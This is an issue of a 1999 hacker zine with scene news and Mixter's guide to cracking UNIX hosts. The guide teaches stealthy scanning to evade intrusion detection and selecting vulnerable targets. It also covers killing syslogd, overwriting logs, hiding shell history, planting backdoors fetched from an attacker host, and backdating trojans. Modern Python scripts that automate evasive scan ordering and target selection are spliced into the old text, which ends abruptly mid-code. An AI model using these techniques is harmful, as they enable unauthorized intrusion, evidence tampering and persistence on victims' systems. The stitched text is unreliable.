vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black
dicentra...(email withheld): IRC+ grrl in black
eentity ...( '' '' ): Currently active/IRC+ man in black
Foreign Correspondents/affiliate members
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Qubik ............................: United Kingdom
D----Y ...........................: USA/world media
HWA members ......................: World Media
Past Foreign Correspondents (currently inactive or presumed dead)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Sla5h.............................: Croatia
N0Portz ..........................: Australia
system error .....................: Indonesia
Wile (wile coyote) ...............: Japan/the East
Ruffneck ........................: Netherlands/Holland
Wyze1.............................: South Africa
Please send in your sites for inclusion here if you haven't already
also if you want your emails listed send me a note ... - Ed
Spikeman's site is down as of this writing, if it comes back online it will be
posted here.
http://www.hackerlink.or.id/ ............ System Error's site (in Indonesian)
Sla5h's email: smuddo@yahoo.com
*******************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen' ***
*******************************************************************
:-p
1. We do NOT work for the government in any shape or form. Unless you count paying
taxes ... in which case we work for the gov't in a BIG WAY. :-/
2. MOSTLY Unchanged since issue #1, although issues are a digest of recent news
events its a good idea to check out issue #1 at least and possibly also the
Xmas issue for a good feel of what we're all about otherwise enjoy - Ed ...
@HWA
00.4 Whats in a name? why HWA.hax0r.news??
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Well what does HWA stand for? never mind if you ever find out I may
have to get those hax0rs from 'Hackers' or the Pretorians after you.
In case you couldn't figure it out hax0r is "new skewl" and although
it is laughed at, shunned, or even pigeonholed with those 'dumb
leet (l33t?) dewds' <see article in issue #4> this is the state
of affairs. It ain't Steven Levy's HACKERS anymore. BTW to all you
up and comers, I'd highly recommend you get that book. It's almost
like buying a clue. Anyway..on with the show .. - Editorial staff
@HWA
00.5 HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Also released in issue #3. (revised) check that issue for the faq
it won't be reprinted unless changed in a big way with the exception
of the following excerpt from the FAQ, included to assist first time
readers:
Some of the stuff related to personal usage and use in this zine are
listed below: Some are very useful, others attempt to deny any possible
attempts at eschewing obfuscation by obscuring their actual definitions.
@HWA - see EoA ;-)
!= - Mathematical notation "is not equal to" or "does not equal"
ASC(247) "wavey equals" sign means "almost equal" to. If written
an =/= (equals sign with a slash thru it) also means !=, =< is Equal
to or less than and => is equal to or greater than (etc, this aint
fucking grade school, cripes, don't believe I just typed all that..)
AAM - Ask a minor (someone under age of adulthood, usually <16, <18 or <21)
AOL - A great deal of people that got ripped off for net access by a huge
clueless isp with sekurity that you can drive buses through, we're
not talking Kung-Fu being none too good here, Buy-A-Kloo maybe at the
least they could try leasing one??
*CC - 1 - Credit Card (as in phraud)
2 - .cc is COCOS (Keeling) ISLANDS but they probably accept cc's
CCC - Chaos Computer Club (Germany)
*CON - Conference, a place hackers crackers and hax0rs among others go to swap
ideas, get drunk, swap new mad inphoz, get drunk, swap gear, get drunk
watch videos and seminars, get drunk, listen to speakers, and last but
not least, get drunk.
*CRACKER - 1 . Someone who cracks games, encryption or codes, in popular hacker
speak he's the guy that breaks into systems and is often (but by no
means always) a "script kiddie" see pheer
2 . An edible biscuit usually crappy tasting without a nice dip, I like
jalapeno pepper dip or chives sour cream and onion, yum - Ed
Ebonics - speaking like a rastafarian or hip dude of colour <sic> also wigger
Vanilla Ice is a wigger, The Beastie Boys and rappers speak using
ebonics, speaking in a dark tongue ... being ereet, see pheer
EoC - End of Commentary
EoA - End of Article or more commonly @HWA
EoF - End of file
EoD - End of diatribe (AOL'ers: look it up)
FUD - Coined by Unknown and made famous by HNN <g> - "Fear uncertainty and doubt",
usually in general media articles not high brow articles such as ours or other
HNN affiliates ;)
du0d - a small furry animal that scurries over keyboards causing people to type
weird crap on irc, hence when someone says something stupid or off topic
'du0d wtf are you talkin about' may be used.
*HACKER - Read Steven Levy's HACKERS for the true definition, then see HAX0R
*HAX0R - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is difficult to
define, I think it is best defined as pop culture's view on The Hacker ala
movies such as well erhm "Hackers" and The Net etc... usually used by "real"
hackers or crackers in a derogatory or slang humorous way, like 'hax0r me
some coffee?' or can you hax0r some bread on the way to the table please?'
2 - A tool for cutting sheet metal.
HHN - Maybe a bit confusing with HNN but we did spring to life around the same
time too, HWA Hax0r News.... HHN is a part of HNN .. and HNN as a proper
noun means the hackernews site proper. k? k. ;&
HNN - Hacker News Network and its affiliates http://www.hackernews.com/affiliates.html
J00 - "you"(as in j00 are OWN3D du0d) - see 0wn3d
MFI/MOI- Missing on/from IRC
NFC - Depends on context: No Further Comment or No Fucking Comment
NFR - Network Flight Recorder (Do a websearch) see 0wn3d
NFW - No fuckin'way
*0WN3D - You are cracked and owned by an elite entity see pheer
*OFCS - Oh for christ's sakes
PHACV - And variations of same <coff>
Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups Virus, Warfare
Alternates: H - hacking, hacktivist
C - Cracking <software>
C - Cracking <systems hacking>
V - Virus
W - Warfare <cyberwarfare usually as in Jihad>
A - Anarchy (explosives etc, Jolly Roger's Cookbook etc)
P - Phreaking, "telephone hacking" PHone fREAKs ...
CT - Cyber Terrorism
*PHEER - This is what you do when an ereet or elite person is in your presence
see 0wn3d
*RTFM - Read the fucking manual - not always applicable since some manuals are
pure shit but if the answer you seek is indeed in the manual then you
should have RTFM you dumb ass.
TBC - To Be Continued also 2bc (usually followed by ellipses...) :^0
TBA - To Be Arranged/To Be Announced also 2ba
TFS - Tough fucking shit.
*w00t - 1 - Reserved for the uber ereet, noone can say this without severe repercussions
from the underground masses. also "w00ten" <sic>
2 - Cruciphux and sAs72's second favourite word (they're both shit stirrers)
*wtf - what the fuck, where the fuck, when the fuck etc ..
*ZEN - The state you reach when you *think* you know everything (but really don't)
usually shortly after reaching the ZEN like state something will break that
you just 'fixed' or tweaked.
@HWA
-=- :. .: -=-
01.0 Greets!?!?! yeah greets! w0w huh. - Ed
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Thanks to all in the community for their support and interest but i'd
like to see more reader input, help me out here, whats good, what sucks
etc, not that I guarantee i'll take any notice mind you, but send in
your thoughts anyway.
* all the people who sent in cool emails and support
FProphet Pyra TwstdPair _NeM_
D----Y Dicentra vexxation sAs72
Spikeman p0lix Vortexia Wyze1
Pneuma Raven Zym0t1c
Ken Williams/tattooman ex-of PacketStorm,
& Kevin Mitnick
kewl sites:
+ http://blacksun.box.sk. NEW
+ http://packetstorm.securify.com/ NEW
+ http://www.securityportal.com/ NEW
+ http://www.securityfocus.com/ NEW
+ http://www.hackcanada.com/
+ http://www.l0pht.com/
+ http://www.2600.com/
+ http://www.freekevin.com/
+ http://www.genocide2600.com/
+ http://www.hackernews.com/ (Went online same time we started issue 1!)
+ http://www.net-security.org/
+ http://www.slashdot.org/
+ http://www.freshmeat.net/
+ http://www.403-security.org/
+ http://ech0.cjb.net/
@HWA
01.1 Last minute stuff, rumours and newsbytes
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"What is popular isn't always right, and what is right isn't
always popular..."
- FProphet '99
+++ When was the last time you backed up your important data?
Thanks to myself for providing the info from my wired news feed and others from whatever
sources, also to Spikeman for sending in past entries.... - Ed
@HWA
01.2 MAILBAG - email and posts from the message board worthy of a read
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
(No mail worthy of posting here this issue,)
Yeah we have a message board, feel free to use it, remember there are no stupid questions...
well there are but if you ask something really dumb we'll just laugh at ya, lets give the
message board a bit more use eh? i'll be using a real message board when the hwa-iwa.org
domain comes back online (soon) meanwhile the beseen board is still up...
==============================================================================
02.0 From the editor.
~~~~~~~~~~~~~~~~
#include <stdio.h>
#include <thoughts.h>
#include <backup.h>
main()
{
printf ("Read commented source!\n\n");
/*
* Forbidden Knowledge has released #7, our props to the FK crew and 2600ZA,
*
* SLa5H is back with news and views from .hr
*
* this issue is a little delayed as i'm getting used to a new keyboard, and
* i've been sick with a bad cold...anyway the hardware...
* natural style keyboard by Micro innovations, its a wicked awesome keyboard
* but my typing speed has to adjust from the trashy standard keyboard I was
* using. i've added a 17 Gig HD to the 10 Gig thats already in my main server
* to go online at some point too and got myself some new cpu speakers ...
*
* Cruciphux
*/
printf ("EoF.\n");
}
Congrats, thanks, articles, news submissions and kudos to us at the
main address: hwa@press.usmc.net complaints and all nastygrams and
mai*lbombs can go to /dev/nul nukes, synfloods and papasmurfs to
127.0.0.1, private mail to cruciphux@dok.org
danke.
C*:.
03.0 The Real ReDATtAck poised to Attack Belgium?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Contributed by Zym0t1c,
September, 28th 99 - A hacker who claims to be the real Redattack plans to
shut down all the electricity in Belgium for about three hours tomorrow
(29th). It'll take place from 1.30pm till 4.30pm. It'll last three hours
because the generators of hospitals and the airport of Belgium can provide
electricity for four hours and he doesn't want anyone getting killed.
He claims to have hacked Electrabel (Belgian electricity provider) and
Belgacom (the biggest telephone company of Belgium (remember also ISP
Skynet?)) He will also release some secret phone numbers of Belgacom
clients and Proximus (cellular phone section of Belgacom) on the Internet
(however no site was mentioned).
Since the original ReDaTtAcK was more a mediawhore than a hacker (considered
by the hacking ethic), this new Redattack took his name, so he claims...
And if the government still doesn't take actions against crimes (?!!??) like
these, he will shut down the whole country next week. We'll see...
Is this a game of 'who's the best Belgian hacker?' I hope not, because real
hackers sometimes suffer because of these (sorry) idiots.
Also today - The original ReDaTtAcK claims to have hacked Planet Internet,
also one of the biggest ISPs of Belgium. He could see some encrypted
VISA numbers and some client information. Planet Internet has increased
their security. They are pressing no charges against him. ReDaTtAcK also claims
to have found an underground child porn network of a school in Belgium. He
gave the information to the police of Gent, but they say his information was
incomplete and maybe incorrect.
Update
~~~~~~~
The original ReDaTtAcK will be RA1
The second, so called 'real' Redattack will be RA2, okay? :)
Sept, 29th 1999 - Belgium
First of all, yesterday I wrote that RA1 claimed to have found an underground
child porn network... Well, nothing of that is true, so say the authorities. RA1
just acted as a little girl in a chatroom and drew the attention of a man. The man
wanted to settle a little appointment between the two of them... Therefore, RA1
gave the information to the authorities assuming he had found a network. The police
say RA1 exaggerated, although there might follow an investigation...
Second, RA2 mailed our newspapers yesterday saying he was impressed by the added
security of Electrabel (Belgian electricity provider). He will not shut down the
electricity but he will just try to break into the system and leave a logo or
something. The IT-staff of Electrabel is rather relax about it. They claim their
security system is unique, because they invented it, and it uses a system that
practically no-one knows how to use, except the IT-staff of Electrabel of course.
So, if he hacks the system, he first needs to learn using the system before he can
actually do something... They are interested in the vulnerabilities of their system
and hope that if RA2 succeeds, he will explain the holes found in their system.
/**
I've also heard of a few people that RA1 has offered his services to Electrabel to
secure their system. I haven't read it or heard it on the radio, it's just what
I've heard (maybe rumours), so I cannot prove it. Are they really playing a game of
who's the best or who gets the most media attention?
**/
The newspaper wrote also that they think RA2 was exaggerating about his skills.
Two days ago he was so sure about hacking this computer and see what happens now:
he pulls back. "When I cannot hack the system, I will make positive publicity about
their security system.", says RA2. Jeezes man! :))
Third, Belgacom (biggest Belgian phone service provider) is pressing a charge against
RA2. He claimed to kill all phonelines in Belgium and to publish secret phone and GSM
numbers on the Internet. Well, there actually was a list with some phone numbers on the
Internet, so people thought he really hacked Belgacom's system and copied the list.
Guess what??? He published some phone and GSM numbers from Advalvas.com. The numbers
were from people who registered for an email address and left their phone and GSM numbers... :)
Because of the fact that RA2 threatened with criminal acts like killing the phone lines
and publishing secret numbers, Belgacom pressed a charge against unknown persons (referring
to RA2, although they just know he's 22 and he works in IT).
Since there has been a charge against him, the police could trace him.
We'll see...
I also added the newspaper article from the same newspaper 'De Standaard' and it's again in
Dutch! Sorry for this! :)))
zym0t1c@ping.be
HNN's Coverage; Belgium Electric Company Threatened by Cyber Intruder
contributed by Maxim.Glory
Belgian electricity provider Electrabel has been
threatened by an an unknown assailant. The cyber
intruder has threatened to turn off all power in the
country sometime between 1:30 and 3:30 pm CET on
Wednesday. According to an Electrabel spokesperson
the system controlling Electrabel's distribution of power
is custom made and the connections are therefore extra
protected. (Oh yeah, security through obscurity, that
always works.)
Svenska Dagbladet - Swedish
http://www.svd.se/paper.asp?menu=/dynamiskt/huvudmeny/did_276436.asp&main=/dynamiskt/senaste_nytt/did_277456.asp
Excite News
http://news.excite.com/news/r/990928/08/odd-hacker
Electrabel
http://www.electrabel.be/
Late Update 0830
contributed by Yaxmon
Minutes after we went to press HNN learned that the
attacker who goes by the name ReDaTtAcK 2, has
withdrawn his threat and now says that he will not be
turning off the power. (Of course now people will
wonder if he ever could have and this person who did
nothing more than make a phone call will forever be
labeled as a 'hacker'. Thanks.)
Reuters
http://www.reuters.com/news/oddly_enough/
Excite;
Hacker Threatens To Leave Country In The Dark
Updated 8:10 AM ET September 28, 1999
BRUSSELS (Reuters) - A computer hacker has threatened to break into the computers of Belgian electricity generator Electrabel
Wednesday afternoon and halt the power supply to the entire country.
"Tomorrow I will leave Belgium without power, and that is not so difficult," the anonymous hacker told the Belgian newspaper Het
Laatste Nieuws.
"Wednesday I will get into Electrabel's computers between 1:30 and 3:30 in the afternoon and shut down all the electricity," the
hacker said.
Electrabel, which has a virtual monopoly on Belgium's electricity market, said it was taking the threat seriously but felt that the
hacker had little chance of succeeding.
"There is very little chance that Belgium could be without power," Electrabel spokesman Phillipe Massart told RTBF television.
"Nonetheless, the risk that someone could access the system always exists."
Massart said the systems that pilot Electrabel's power distribution were developed specifically for the company and have protected
connections. He said the company was taking measures to ensure its security.
Hacker Changes Mind About Switching Off Country
Updated 9:55 AM ET September 29, 1999
BRUSSELS (Reuters) - A computer hacker has backed down from a threat to break into the computers of Belgian electricity
generator Electrabel Wednesday afternoon and cut the nation's power supply, Electrabel said.
The hacker, who calls himself ReDaTtAcK 2, phoned Electrabel, which has a virtual monopoly on Belgium's electricity market, to
withdraw the threat.
"I had this guy on the phone," spokesman Patrick De Vos told Reuters. "He withdrew his threat. It's a non-event."
The hacker launched a crusade earlier in the summer, attacking Web sites in an attempt to alert Belgium to the security risks of the
Internet.
De Vos said the hacker had threatened to break into Electrabel's computers to prove the system's vulnerability.
"He would like to try and find a hole and insert his business card and say this is a failure in the system," De Vos said.
He said the company had taken the threat seriously but did not believe its system had ever been at risk.
@HWA
04.0 FAQ and Guide to Cracking by Mixter
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From http://blacksun.box.sk/
-----BEGIN PGP SIGNED MESSAGE-----
FAQ and Guide to Cracking
(c) 1999 by Mixter
Disclaimer:
This is a theoretical instruction to cracking and for informational
purposes. It should be seen as an introduction to the methods and
strategies used by crackers rather than a howto. The author is not
suggesting to perform illegal actions and cannot be held liable
for any actions of other individuals who perform any of the actions
discussed in this paper and possible resulting damage.
Introduction:
I am going to describe the methods and strategies used to access
various UNIX hosts on the internet without authorization. This guide will
not teach you how to hack, neither do you have to be a hacker to use
the techniques described here. Hacking means finding your own way
to do it, and finding new approaches to accomplishing something. I am
only going to supply you with one possible approach to cracking.
I. Prerequisites
Operating System:
You certainly need Unix installed on your home computer. WINDOWS
WILL NOT DO IT. I'm not going into details here, but you should take
either Net/Open/FreeBSD or Linux because they are POSIX compliant,
suitable for Home PC's and most small network tools will compile
on them. If you use Linux [1], you should not use the RedHat, SuSE, or
Slackware distributions unless you know how to secure them properly.
Local root compromise can be fatal as you may reveal your identity.
Basic Knowledge:
Get experienced with the following tools. Use the 'man' command,
and work with them until you fully understand them. These tools are:
awk cat chmod dd grep gzip kill ln
ls mail mknod more mount ping ps sed
sort tar ifconfig ipfwadm last head tail
gcc cut find ftp less vim nc (netcat)
rcp xhost xterm syslogd inetd telnet ssh finger
Security requirements:
You need to make sure that no one can compromise your own host. Check
security sites to make sure your daemons (servers) are not exploitable.
Do not allow anyone to use your box. Disable telnet, rlogin, and whatever
you don't need yourself. Ideally, you do not run any servers at all while
you are attacking other hosts. Consider encrypting directories and/or
complete partitions with encrypted file systems and encrypt emails and
files you transfer with PGP. [2]
Account:
For your activities, you require an ISP account with a direct connection,
which normally all ISPs provide. You might want to consider not doing
any 'cracking' activities from your home at all, in which case you need
a fast linux or bsd shell account, which must not be from a commercial
shell provider (esp. those who sell eggdrop and irc accounts), and if
you use a university account, you need to make sure that they do not
watch / monitor their users. If you use a dialup, ensure yourself that
no transparent proxies or network monitors (squid etc.) are being run by
your provider. Do a traceroute and check your providers backbone routers
for NIDS (Intrusion Detection), network monitors, proxies, and anything
that seems unusual; alternatively let someone with more knowledge do it.
II. Scanning
Avoiding track-downs:
Where you scan from is up to you. Whatever you do, don't scan from your
dialup while using a legit internet account. Everyone knowing your IP is
a phone call to your provider away from knowing your identity. If you
use fake accounts, avoid using fake or stolen credit cards to make them.
Also avoid using 1-800 numbers at all costs, because the 1-800 nodes
generally log every calling phone number with access time. Inquire about
the ISP you use to make sure it is not in explicit cooperation with federal
agencies. Additionally, do not stay longer than 5 (in words: five) hours
on the internet without hanging up and reconnecting. Why? If you are
logged on, the node has your account associated with your current
dynamic IP address for obvious technical reasons, and they also might
be able to trace you. Most nodes will not keep a table of which IP
belongs to which account once they disconnected, especially on huge
ISP where this would take large additional resources.
I advise against relaying through WinGate and SOCKS servers,
because they give you a false feeling of safety. Often, these servers are
logging every access and sometimes they are put up by federal agencies
itself. You should ideally relay your connections through a server you
have root, hence full control, on, using datapipe, bnc, ssl, or a
wingate/socks server with logging completely disabled.
Stealthy scanning:
A scan not being noticed is a successful scan. Half-open (SYN)
scans are not enough: they never reach the daemon, but any SYN logger
such as tcplogd or a sniffer sees them, and a connect() scan that
resets the connection early leaves a
"warning: can't get client address: Connection reset by peer"
or similar message in the tcp_wrappers log, so someone looking at the
logs sees who is scanning them. Advanced and recommended scans
are NULL (tcp packet without any flags), XMAS (FIN, PSH and URG
flags set), and Maimon (FIN/ACK) scans, which can be done with nmap [3].
Note that these rely on the target following RFC 793 (no RST for a
flagless or odd-flag packet to an open port); Windows and many Cisco
stacks send RST regardless, so every port looks closed, and an IDS
can flag such packets precisely because no normal client sends them.
If you use connect() scans, which are much more reliable, then use
lscan, and get the version info. This generally makes the most sense
because you have to get the daemon's versions anyway to see
if it is exploitable.
Play dead:
As you scan, I strongly recommend disabling every single service
on the machine you're scanning from and setting packet filtering
rules. This will fool the hosts being scanned into thinking your
host is down and the scan is spoofed.
A few things you should disable:
* Inetd ( identd, finger, ftp, telnet )
* All INCOMING tcp connection requests (ipfwadm: -y flag)
* ICMP echo, timestamp, information and address mask requests (ICMP types 8/13/15/17)
* UDP Traceroute queries (udp port range 33400-33500)
Also note that -deny is better than -reject, which would send
an ICMP unreach packet back instead of keeping totally silent.
Non-sequential scanning:
This is important: Use non-sequential scanning to avoid
intrusion detection systems. An IDS or NIDS is installed on a gateway
or router and monitors unusual traffic to certain ports. If you scan
1.1.1.1, 1.1.1.2 .. 1.1.1.255, 1.1.2.1 etc.,
an intrusion detection system can detect your scan against 1.1.1.*.
Instead, scan like this: 1.1.1.1, 1.1.2.1 .. 1.1.255.1, 1.1.1.2
You get the point.
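That walk, as an added example (this Python is not part of Mixter's guide): a generator that emits a block last-octet-major exactly as described, or with the /24s visited in a seeded random order so the stride is not itself a fixed pattern, plus a counter that shows what a per-/24 detector would see. The 10.0.0.0/22 block is a made-up input.

```python
import ipaddress
import random


def nonsequential_order(network, shuffle_subnets=False, seed=None):
    """Yield host addresses of `network` so that no two consecutive probes
    fall in the same /24.

    Default order is the one the guide describes: every .1 host of each
    /24, then every .2 host, and so on.  With shuffle_subnets=True the
    /24s are visited in a seeded random order, so the stride itself is
    not a fixed, recognisable pattern.
    """
    net = ipaddress.ip_network(network, strict=False)
    if net.prefixlen > 24:
        # Block smaller than a /24: there is nothing to interleave.
        hosts = [str(h) for h in net.hosts()]
        if shuffle_subnets:
            random.Random(seed).shuffle(hosts)
        yield from hosts
        return
    subnets = list(net.subnets(new_prefix=24))
    if shuffle_subnets:
        random.Random(seed).shuffle(subnets)
    for last in range(1, 255):            # skip .0 and .255 of each /24
        for sn in subnets:
            yield str(sn.network_address + last)


def adjacent_same_slash24(addresses):
    """Count consecutive pairs that share a /24, i.e. what a detector that
    keys on one /24 at a time would notice.  0 means the ordering never
    touches the same /24 twice in a row."""
    prev = None
    hits = 0
    for a in addresses:
        cur = ipaddress.ip_network(a + "/24", strict=False)
        if prev is not None and cur == prev:
            hits += 1
        prev = cur
    return hits


if __name__ == "__main__":
    order = list(nonsequential_order("10.0.0.0/22"))   # made-up block
    print(order[:5], "...", len(order), "addresses")
    print("consecutive same-/24 pairs:", adjacent_same_slash24(order))
    sequential = [str(h) for h in ipaddress.ip_network("10.0.0.0/22").hosts()]
    print("sequential order for comparison:", adjacent_same_slash24(sequential))
```

Keep the limitation in mind: the stride only defeats a detector that keys on one /24 at a time. A detector that counts distinct destinations per source address over a time window sees the same number of probes whatever the order, so this ordering buys nothing against that class of IDS.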
What to scan:
Most crackers resolve a top-level domain like .com .net or a
country like .ee .se .ch etc. using z0ne or axfr from ADM [4], or
by using a simple recursive shell script. host -l domain will
not do for a scan, because you'll miss all the subnets that way,
and there are plenty of them.
However, I'd rather suggest scanning complete IP blocks. Depending
on your greed, you can either scan a class B (1.1.*.*) or class A
(1.*.*.*) network. You might wish to obtain some information about
your targets first. To do this, you can query whois.arin.net, the
registration center for IP addresses. Lets say you want to scan
192.168.*.* and you want to know who owns that IP block. Type:
whois -h whois.arin.net 192.168.0.0
or
whois 192.168.0.0@whois.arin.net
and you get a short description of the owners of that netblock.
If arin.net doesn't find any information, don't scan it, because
the IPs are probably not yet in use. Some info on the 'whois'
results...
Maintained by RIPE.NET = European (no, uk, ch, at, de, se, dk, ee, tr, li, etc.)
Maintained by APNIC.NET = Asia-Pacific (au, jp, kr, id, kh, etc.)
Maintained by NIC.xxx = Belonging to country xxx
Finding vulnerable hosts:
First rule of scanning is: never delete your scan logs. If
you think you are completely done with evaluating your logs,
then compress, encrypt and store them, dont delete them. New
security vulnerabilities will be found sooner or later, then you
won't have to scan it all again.
From my experience, the vulnerability scanners are almost all
bullshit, you dont need them. Use grep and awk to extract the
IP numbers from your scan logs, like this...
grep "QPOP" port110.log | grep "(version 2.2)" | awk '{print $1}' > 0wn.txt
(presuming that your scanner logs like this: "<IP> - <CAPTURED VERSION>")
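The same triage in Python, as an added example rather than Mixter's own tooling: it parses the "<IP> - <CAPTURED VERSION>" lines, pulls a numeric version out of the banner so you can select "at or below version X" instead of one exact string, and de-duplicates hosts that were logged twice. The log lines are constructed for the example (documentation addresses, not real hosts); the product name and version threshold are parameters, not a claim about any particular release.

```python
import re

LINE_RE = re.compile(r"^(?P<ip>(?:\d{1,3}\.){3}\d{1,3})\s+-\s+(?P<banner>.+)$")
VERSION_RE = re.compile(r"(\d+(?:\.\d+)+)")


def parse_scan_log(lines):
    """Yield (ip, banner) for every well-formed '<IP> - <banner>' line.
    Lines that do not match (blank lines, noise) are skipped rather than
    aborting the run, so a partly garbled log is still usable."""
    for line in lines:
        m = LINE_RE.match(line.strip())
        if m:
            yield m.group("ip"), m.group("banner").strip()


def version_tuple(banner):
    """First dotted number in the banner as an int tuple, or None.
    Tuples compare numerically, so (2, 10) > (2, 2); a string grep for
    'version 2.2' would not see 2.10 as newer, or even as a version at all."""
    m = VERSION_RE.search(banner)
    if not m:
        return None
    return tuple(int(p) for p in m.group(1).split("."))


def select_hosts(lines, product, max_version=None):
    """IPs whose banner names `product` (case-insensitive) and, if
    max_version is given, whose version is <= that tuple.  Sorted
    numerically by address and de-duplicated."""
    found = set()
    for ip, banner in parse_scan_log(lines):
        if product.lower() not in banner.lower():
            continue
        if max_version is not None:
            v = version_tuple(banner)
            if v is None or v > max_version:
                continue
        found.add(ip)
    return sorted(found, key=lambda ip: tuple(int(o) for o in ip.split(".")))


# Constructed sample, in the log layout the guide assumes (not real hosts).
SAMPLE_LOG = """\
192.0.2.10 - +OK QPOP (version 2.2) at mail starting.
192.0.2.11 - +OK QPOP (version 2.53) at mail starting.
192.0.2.9 - +OK QPOP (version 2.2) at mail starting.
192.0.2.12 - connect: Connection timed out
192.0.2.10 - +OK QPOP (version 2.2) at mail starting.
198.51.100.3 - +OK Some-Other-POP 1.0 ready
garbage line without the separator
""".splitlines()


if __name__ == "__main__":
    print(select_hosts(SAMPLE_LOG, "QPOP", max_version=(2, 2)))
```

Feed it the saved logs rather than a fresh scan, which is the point of the "never delete your scan logs" rule: when a new version range becomes interesting, only the threshold changes.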
There are a couple of cases where you need an additional scan
to find vulnerable versions, which are:
Buggy Daemon Scanner Scans for...
wu-ftp BETA-18 wuftpscan/ben (private) Writable dir
portmap rpcinfo -p (unix tool) Portmap Version
ttdbserver rpcinfo ttdb version
rstatd statdscan rstatd version
mountd mountdscan (rootshell) mountd/nfs version
bind binfo-udp (rootshell), bind version
nscan (my site),
mbind (private)
III. Rooting
Lets think about the first commands you issue. They should:
1. Discreetly remove traces of the root compromise
2. Gather some general info about the system
3. Make sure you can get back in
4. Disable or patch the vulnerable daemon(s)
Here are my suggestions...
1. killall -9 syslogd klogd - pesky loggers! only a few admins
will notice if they get turned off. Now you can act freely.
copy secure.1 and messages.1 from /var/log over secure and messages
Normally, these logs are the only ones with the intruders IP
and traces of a root compromise in them. If *.1 doesn't exist,
truncate the files. Also, unset HISTFILE is important.
Nobody does unset HISTFILE, thus leaving a .bash_history in
/var/named or even /. Very unprofessional :).
2. uname -a, w, last -10, cat /etc/passwd /etc/inetd.conf...
Inform yourself about the frequency the system is being
maintained, administrated, if the logfiles are being analyzed.
* Look how many people have access to it (/etc/passwd) - the
more the better for you (keeps attention away from you).
* Look if the system is already backdoored!! you might want to
remove other backdoors.
* Look for a loghost or snmp (dangerous because you can't manipulate
the logs on a far-away loghost). Watch out for *logd, sniffers,
netmon's etc before you do anything great on the host.
If you are paranoid, traceroute the host, and see if non-routers
are before that host (probably IDS, loghost, sniffer, etc).
3. This is important: DON'T MANIPULATE THE SYSTEM CONFIGURATION! DOH!
It is too easy to detect you if you add yourself to /etc/passwd,
or open a port by manipulating inetd.conf. Let me tell you that
root kits and /bin/login trojans are the first things any sane admin
will watch for. Install a nice stealthy port backdoor. My approach
to uploading files is doing:
(on your box)
$ uuencode -m backdoor.c backdoor.c | less
<uu encoded junk appears, which you copy with your mouse>
(on the target box)
uudecode
<it waits for input, paste the uuencoded stuff, page-by-page>
# cc -o backdoor backdoor.c
A nice different method is putting a daemon on your own box, on
port 666, that spits out the source code when someone telnets to
it, so you can do telnet ppp-42.haxor.net 666 > backdoor.c
As I said, make sure you can get back in. If the box you rooted
has an uptime of more than 300 days or so, you might consider
not installing the backdoor for startup. Instead, kill the
vulnerable daemon, and when the host restarts, come back using an
exploit. Normally, you can replace a lame daemon that nobody uses
with your backdoor. Look at inetd.conf to see what daemons are
active. A safe bet is in.talkd which often is activated but seldom
ever used. So, when you want to re-activate your backdoor,
talk root@0wned.host.com for a second, and your backdoor is running.
You can also add /path/to/backdoor to /root/.profile, but it is
a bit riskier than the inetd backdoor method.
4. Subscribe to bugtraq, CIAC security list, or look at rootshell,
to see what you need to do to patch your buggy stuff. If RPM is
installed you can try an rpm -U ftp://ftp.cdrom.com/rightdir/daemon.rpm
If not, use ncftp to fetch the file anonymously, because it doesn't need
user interaction. If you want, add an additional backdoor in your
"patched" server. QPOP 2.53 even supports this itself.
For all files you replace, you should modify the time stamps,
which won't help, if the admin uses tripwire or cksum, but if the
admin is, like most admins, a complete lamer that does find / -ctime
to scan for trojans and thinks he knows his job. :P
To modify timestamps, you do a simple:
touch -r /bin/bash /path/to/your/trojan
this will copy the exact date/time info from /bin/bash
over your freshly added trojan. Voila!
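For the admin's side of this: touch -r copies the reference file's atime and mtime, but it cannot set ctime, which the kernel bumps to "now" on every such change, so a backdated file shows an old mtime next to a recent ctime. The Python sweep below is an added example, not part of the original article; it walks a tree, flags files whose mtime predates their ctime by more than a threshold, and builds a constructed sample tree (the paths and the 3600-second threshold are my own choices) to show a hit and a non-hit.

```python
from __future__ import annotations

import os
import stat
import tempfile
import time
from dataclasses import dataclass


@dataclass
class Finding:
    path: str
    mtime: float
    ctime: float

    @property
    def gap_seconds(self) -> float:
        # How much older the (settable) mtime is than the (kernel-controlled) ctime.
        return self.ctime - self.mtime


def find_backdated_files(root: str, min_gap_seconds: float = 3600.0) -> list[Finding]:
    """Return regular files under `root` whose mtime predates their ctime by more
    than `min_gap_seconds`.

    utime()/touch -r can rewrite atime and mtime, but each such call also sets
    ctime to the current time, so a file that was backdated after installation
    shows an old mtime beside a fresh ctime. This is a triage heuristic only:
    package managers that preserve build-time mtimes produce the same pattern,
    so confirm a hit against a checksum baseline (tripwire/cksum) before acting.
    """
    findings: list[Finding] = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: do not follow symlinks
            except OSError:
                continue  # vanished or unreadable; keep sweeping
            if not stat.S_ISREG(st.st_mode):
                continue
            if st.st_ctime - st.st_mtime > min_gap_seconds:
                findings.append(Finding(path, st.st_mtime, st.st_ctime))
    return findings


def build_demo_tree() -> tuple[str, str, str]:
    """Constructed sample tree: one file left alone, one backdated with utime(),
    which is what touch -r does under the hood. Returns (root, clean, backdated)."""
    root = tempfile.mkdtemp(prefix="ctime_demo_")
    clean = os.path.join(root, "bin", "untouched")
    backdated = os.path.join(root, "sbin", "planted")
    for p in (clean, backdated):
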